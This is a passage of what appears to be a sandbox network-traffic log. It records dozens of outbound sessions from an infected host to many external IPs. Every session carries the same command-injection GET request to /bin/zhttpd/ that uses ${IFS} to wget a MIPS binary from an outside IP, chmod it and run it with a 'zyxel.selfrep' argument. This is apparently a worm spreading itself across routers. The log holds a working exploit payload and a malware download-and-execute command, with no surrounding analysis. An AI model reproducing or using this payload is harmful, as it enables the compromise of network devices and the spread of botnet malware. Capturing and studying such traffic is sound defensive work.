                                        Jan 14, 2024 16:18:53.672086000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6747192.168.2.134927413.122.167.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672152996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6748192.168.2.1345432182.110.34.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672180891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6749192.168.2.13529709.217.121.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672240019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6750192.168.2.135232067.165.154.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672267914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6751192.168.2.135019439.175.174.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672295094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6752192.168.2.135281893.199.134.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672349930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6753192.168.2.1343050181.223.225.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672408104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6754192.168.2.134093269.92.27.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672421932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6755192.168.2.1356482139.243.110.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672486067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6756192.168.2.1340328138.234.170.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672508001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6757192.168.2.134327688.115.135.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672578096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6758192.168.2.135547482.227.9.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672590017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6759192.168.2.1341462213.149.221.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672630072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6760192.168.2.1340776162.20.198.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672671080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6761192.168.2.1349266147.156.232.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672703981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6762192.168.2.1360822139.150.218.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672749996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6763192.168.2.1357768179.140.250.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672777891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6764192.168.2.1341990169.155.213.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672842026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6765192.168.2.1349738169.111.181.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672888041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6766192.168.2.1343652104.112.72.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672930002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6767192.168.2.135717840.94.127.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672965050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6768192.168.2.135836214.57.24.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673011065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6769192.168.2.1357988146.202.226.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673058987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6770192.168.2.1337900109.23.230.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673114061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6771192.168.2.135872270.175.16.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673152924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6772192.168.2.1351272188.142.193.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673191071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6773192.168.2.134054250.150.158.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673244953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6774192.168.2.1350994133.125.154.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673264027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6775192.168.2.133967494.202.249.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673304081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6776192.168.2.1340636122.157.44.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673346996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6777192.168.2.1349500144.148.178.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673386097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6778192.168.2.135486283.1.1.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673418999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6779192.168.2.1339076130.119.57.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673449039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6780192.168.2.133948845.215.161.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673510075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6781192.168.2.133710614.49.250.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673553944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6782192.168.2.135976443.86.140.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673598051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6783192.168.2.135602469.225.18.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673657894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6784192.168.2.135181638.119.46.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673671007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6785192.168.2.1353464170.42.11.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673702955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6786192.168.2.1358990217.219.19.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673744917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6787192.168.2.1354386136.133.124.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673794031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6788192.168.2.1352728178.22.12.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673836946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6789192.168.2.1355184212.148.230.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673892021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6790192.168.2.1341902144.35.234.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673957109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6791192.168.2.135691288.158.215.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.673988104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6792192.168.2.1343776202.157.139.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674032927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6793192.168.2.1334660211.183.30.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674066067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6794192.168.2.1352148120.160.221.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674097061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6795192.168.2.13500622.17.74.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674115896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6796192.168.2.135503897.61.47.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674185038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6797192.168.2.134203694.77.149.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674221992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6798192.168.2.133383232.154.19.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674266100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6799192.168.2.134796898.233.246.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674325943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6800192.168.2.1351138172.124.161.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674359083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6801192.168.2.1333504104.69.178.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674392939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6802192.168.2.1354604172.58.57.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674441099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6803192.168.2.135221612.174.213.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674463987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6804192.168.2.1342264107.10.34.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674520016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6805192.168.2.1338464166.75.149.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674566984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6806192.168.2.135917044.141.153.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674602985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6807192.168.2.134393258.188.253.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674632072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6808192.168.2.134445478.2.75.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674674034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6809192.168.2.1357590196.204.212.187443
                                        TimestampBytes transferredDirectionData
